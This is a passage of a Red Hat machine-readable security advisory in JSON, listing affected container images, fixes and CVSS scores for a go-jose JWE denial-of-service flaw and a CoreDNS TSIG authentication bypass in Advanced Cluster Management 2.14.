"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-34986"
},
{
"category": "external",
"summary": "RHBZ#2455470",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455470"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-34986",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34986"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-34986",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34986"
},
{
"category": "external",
"summary": "https://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8",
"url": "https://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8"
},
{
"category": "external",
"summary": "https://pkg.go.dev/github.com/go-jose/go-jose/v4#pkg-constants",
"url": "https://pkg.go.dev/github.com/go-jose/go-jose/v4#pkg-constants"
}
],
"release_date": "2026-04-06T16:22:45.353000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T20:51:55+00:00",
"details": "For release note details, see the upstream Submariner release notes:\n\nhttps://submariner.io/community/releases/\n\nDownstream-specific issues resolved:\n* ACM-27238\n* ACM-28294\n* ACM-28295\n* ACM-28311\n* ACM-28313\n* ACM-28314\n* ACM-28315\n* ACM-28316\n* ACM-28329\n* ACM-28331\n* ACM-28333\n* ACM-28335\n* ACM-28337\n* ACM-28339\n* ACM-28342\n* ACM-29317\n* ACM-29511\n* ACM-29613\n* ACM-29614\n* ACM-29631\n* ACM-29632\n* ACM-29633\n* ACM-29634\n* ACM-29776\n* ACM-30134\n* ACM-30726\n* ACM-30727\n* ACM-30728\n* ACM-30729\n* ACM-30970\n* ACM-31136\n* ACM-31831\n* ACM-31840\n* ACM-32575\n* ACM-32842\n* ACM-34108\n* ACM-34586\n* ACM-34589\n\nFor more details, see the Red Hat Advanced Cluster Management for Kubernetes documentation:\n\nhttps://docs.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.14/",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:25127"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "github.com/go-jose/go-jose/v3: github.com/go-jose/go-jose/v4: Go JOSE: Denial of Service via crafted JSON Web Encryption (JWE) object"
},
{
"cve": "CVE-2026-35579",
"cwe": {
"id": "CWE-303",
"name": "Incorrect Implementation of Authentication Algorithm"
},
"discovery_date": "2026-05-05T21:01:06.423844+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2466905"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in CoreDNS. An unauthenticated network attacker can exploit incorrect handling of TSIG (Transaction Signature) authentication in the gRPC, QUIC, DoH (DNS over HTTPS), and DoH3 transport implementations. This vulnerability allows an attacker to bypass TSIG protection, leading to unauthorized access to functionalities such as zone transfers and dynamic DNS updates. For DoH and DoH3, the issue is more severe as any request with a TSIG record is treated as authenticated, even with an invalid key.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/coredns/coredns: CoreDNS: Authentication bypass allows unauthorized access to TSIG-protected functionalities",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
